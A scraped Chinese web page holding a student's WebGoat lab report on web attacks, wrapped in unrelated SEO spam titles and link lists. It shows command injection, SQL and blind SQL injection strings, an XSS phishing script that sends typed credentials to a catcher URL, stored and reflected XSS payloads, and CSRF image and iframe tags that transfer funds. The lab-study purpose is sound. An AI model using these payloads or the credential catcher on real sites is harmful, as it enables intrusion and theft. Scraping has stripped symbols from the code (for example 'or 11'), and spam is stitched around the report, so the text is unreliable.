当前位置: 首页 > news >正文

哪个网站做试卷吧有答案wordpress精简版

哪个网站做试卷吧有答案,wordpress精简版,二级域名网站好不好,北京最好的网站建设2018-2019-2 20165221 【网络对抗技术】-- Exp9 Web安全基础 目录#xff1a; 一 . 实验要求二 . 实验过程记录 1 . Webgoat安装2 . SQL注入的攻击 命令注入#xff08;Command Injection#xff09;数字型注入#xff08;Numeric SQL Injection#xff09;日志欺骗#…2018-2019-2 20165221 【网络对抗技术】-- Exp9 Web安全基础 目录 一 . 实验要求二 . 实验过程记录 1 . Webgoat安装2 . SQL注入的攻击 命令注入Command Injection数字型注入Numeric SQL Injection日志欺骗Log SpoofingSQL 注入LAB: SQL Injection字符串注入String SQL Injection数据库后门Database Backdoors数字型盲注入Blind Numeric SQL Injection字符串型盲注入Blind String SQL Injection3 . XSS攻击 XSS 钓鱼Phishing with XSS存储型XSS攻击Stored XSS Attacks反射型XSS攻击Reflected XSS Attacks4 . CSRF攻击 跨站请求伪造Cross Site Request Forgery (CSRF)绕过 CSRF 确认 CSRF Prompt By‐Pass三 . 实验基础问题回答四 . 试验中遇到的问题五 . 实验总结与体会一 . 实验要求 本实践的目标理解常用网络攻击技术的基本原理做不少于7个题目共3.5分。包括(SQL,XSS,CSRF)。二 . 实验过程记录 1 . Webgoat的安装 因WebGoat默认使用8080端口所以开启前先用netstat -tupln | grep 8080查看端口是否被占用如果被占用用kill 进程号终止占用8080端口的进程。下载webgoat-container-7.0.1-war-exec.jar,再将其拷贝到虚拟机中普通安装命令行输入java -jar webgoat-container-7.0.1-war-exec.jar浏览器转:localhost:8080/WebGoat直接用默认用户名密码登录即可开始练习2 . SQL的注入攻击 1.Command Injection 选择 Injection Flaws - Command Injection右键页面中复选框选择inspect Element审查网页元素对源代码进行修改在末尾添加 netstat -an ipconfig点击 view看到网络端口使用情况和 IP 地址攻击成功2.Numeric SQL Injection 选择 Injection Flaws - Numeric SQL Injection右键页面中复选框选择inspect Element审查网页元素对源代码value101进行修改在城市编号101后面添加or 11点击Go可以看到攻击成功 3.日志欺骗Log Spoofing通过在日志文件中插入脚本实现欺骗。在日志文件中愚弄人的眼睛攻击者可以利用这种方式清除他们在日志中的痕迹目标灰色区域代表在 Web 服务器的日志中的记录的内容我们的目的是使用户名为“admin”的用户在日志中显示“成功登录”4.SQL 注入LAB: SQL Injection 选择 Injection Flaws - String SQL Injection右键页面将password密码框选择inspect Element审查网页元素对源代码进行修改将其最大长度限制改为20用该用户信息进行登录攻击成功并获得账户信息的列表。 5.字符串盲注入Blind String SQL Injection前提是要知道pin值这次查询的是一个字符串而不是数值。输入101 AND (SUBSTRING((SELECT name FROM pinsWHERE cc_number’4321432143214321′), 1, 1) ‘H’ ); 将1换成2101 AND (SUBSTRING((SELECT name FROM pinsWHERE cc_number’4321432143214321′), 2, 1) ‘H’ );最后使用二分法测试最终得到PIN的字段为:Jill3 . XSS的攻击 1.XSS钓鱼 编写一个带有用户名的和密码框的表格//脚本 /form scriptfunction hack(){ XSSImagenew Image;XSSImage.srchttp://localhost:8080/WebGoat/catcher?PROPERTYyesuser document.phish.user.value password document.phish.pass.value ;alert(Had this been a real attack... Your credentials were just stolen. User Name document.phish.user.value Password document.phish.pass.value);} /script form namephish br br //表格 HRH2This feature requires account login:/H2 brbrEnter Username:brinput typetext nameuserbrEnter Password:brinput typepassword name pass brinput typesubmit namelogin valuelogin onclickhack() /form br br HR 我们在搜索到的表单中输入用户名和密码点击登录WebGoat会将输入的信息捕获并反馈给我们。2.存储型XSS攻击Stored XSS Attacks 这种攻击常见于论坛等留言平台用户留言的时候输入一段JavaScript脚本这段脚本就会被保存在数据库中。因为是留言所以任何用户在打开网页的时候这个脚本就会被从数据库中取出来而运行根据题目要求在留言板中输入scriptalert(Youve been attacked!!!);/script再次点击刚刚创建的帖子可以看到弹出窗口3.反射型XSS攻击Reflected XSS Attacks 原理在反射的XSS攻击中攻击者可以使用攻击脚本创建一个URL并将其发布到另一个网站、通过电子邮件或其他方式让受害者点击它。目标使用攻击脚本创建URL并将其写入网站中当读取到该URL的时候就会被攻击具体操作输入代码scriptalert(hhhhh Youve been attacked!!!);/script点击purse的同时页面就给出了反馈: ---4 . CSRF的攻击 1.跨站请求伪造Cross Site Request Forgery (CSRF) 跨站请求伪造尽管听起来像跨站脚本XSS但它与XSS非常不同XSS利用站点内的信任用户而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比CSRF攻击往往不大流行因此对其进行防范的资源也相当稀少和难以防范所以被认为比XSS更具危险性。查看页面右侧Parameters中的src和menu值分别为267和900 在title中输入任何参数message框中输入img srchttp://localhost:8080/WebGoat/attack?Screen267menu900transferFunds5000 width1 height1 /,以图片的的形式将URL放进Message框。这时的URL对其他用户是不可见的用户一旦点击图片就会触发一个CSRF事件点击Submit提交在Message List中生成以Title命名的消息。点击该消息当前页面就会下载这个消息并显示出来转走用户的5000元从而达到CSRF攻击的目的。可以从左侧的任务栏看到任务已完成。查看页面下侧Parameters中的src和menu值命名titlemessage框中输入代码iframe srcattack?Screen[scr]menu[menu]transferFunds5000 /iframeiframe srcattack?Screen[scr]menu[menu]transferFundsCONFIRM /iframe 三 . 实验基础问题回答 (1) SQL注入的原理是什么如何进行防御呢 原理SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序而这些输入大都是SQL语法里的一些组合通过执行SQL语句进而执行攻击者所要的操作使非法数据侵入系统。防御手段 对用户的输入进行校验。 不要使用动态拼装sql可以使用参数化的sql- 或者直接使用存储过程进行数据查询存取。不要使用管理员权限的数据库连接为每个- 应用使用单独的权限有限的数据库连接。不要把机密信息直接存放加密或者hash掉密码和敏感的信息。应用的异常信息应该给出尽可能少的提示。 采取辅助软件或网站平台来检测sql注入。(2) XSS攻击的原理是什么如何进行防御呢 原理XSS是一种经常出现在web应用中的计算机安全漏洞它允许恶意web用户将代码如HTML代码和客户端脚本植入到提供给其它用户使用的页面中攻击者可以利用XSS漏洞旁路掉访问控制。防御手段 特征匹配方式在所有提交的信息中都进行匹配检查一般会对“javascript”这个关键字进行检索一旦发现提交信息中包含“javascript”就认定为XSS攻击。对所有用户提交内容进行可靠的输入验证包括对URL、查询关键字、HTTP头、POST数据等仅接受指定长度范围内、采用适当格式、采用所预期的字符的内容提交对其他的一律过滤。实现Session标记、CAPTCHA系统或者HTTP引用头检查以防功能被第三方网站所执行。(3) CSRF攻击原理是什么如何进行预防呢 原理CSRF跨站请求伪造也被称为“oneclickattack”或者sessionriding通常缩写为CSRF或者XSRF是一种对网站的恶意利用通过伪装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击。 防御手段 在form中包含秘密信息、用户指定的代号作为cookie之外的验证。“双提交”cookie。某个授权的cookie在form post之前正被JavaScript代码读取那么限制跨域规则将被应用。服务器需要在Post请求体或者URL中包含授权cookie的请求那么这个请求必须来自于受信任的域。用户在浏览其它站点前登出站点或者在浏览器会话结束后清理浏览器的cookie。五 . 实验总结与体会 这是最后一次的实验了这次实验在前期软件的安装上花费了大量的时间后面的照着操作就问题不大主要是对攻击概念的理解。转载于:https://www.cnblogs.com/0630tx/p/10922917.html
http://www.sadfv.cn/news/356875/

相关文章:

  • 滨海做网站公司做钢管网站
  • 做网站昆山wordpress 强密码 弱
  • 建网站主机wordpress 搜索 插件
  • 企业oa网站建设方案wordpress查看数据库文件
  • 佛山网站制作咨询设计之家官网入口
  • 网站建设投入及费用做网站 就
  • 网站的前台和后台自己怎么注册域名
  • 在线手机建网站建设银行网站字体
  • 什么样的网站是一个成功的网站云平台网站建设方案
  • 外网图片素材网站wordpress主题文章列表
  • 建设网站答辩情况wordpress 直播插件
  • 建材企业网站源码佛山最好的网站建设
  • 德州网站制作贵州做农业网站
  • 安徽圣力建设集团有限公司网站个人网站怎么做联盟推广
  • 企业网站建设排名口碑上海百度推广优化公司
  • 海外 酒店 网站建设优化法治化营商环境
  • 做网站怎么添加关键词毕设做系统与网站
  • 潍坊 专业网站建设想自己搞一个视频网站怎么做
  • 网站电脑培训班附近有吗宁夏建设厅官方网站
  • 企业网站建设建设wordpress wp config
  • 做网站不会P图怎么办亿网
  • 福州网站建设新闻渗透网站做seo
  • 宁波市建设工程检测协会网站网页开发制作
  • 怎么把自己做的网站弄到域名上设计网站能否用素材来制作广告
  • 推荐个2021能看的网站免费wordpress使用教程
  • 沧州网站建设优化贵州建设厅网站政务大厅
  • 做网站的工具+论坛网站标题有特殊符号
  • 广告设计与制作专业能考二建吗南京seo优化公司
  • 广州做网站需要多少钱网站建设个人兼职
  • 一个网站百度百科怎么做关于普通话的手抄报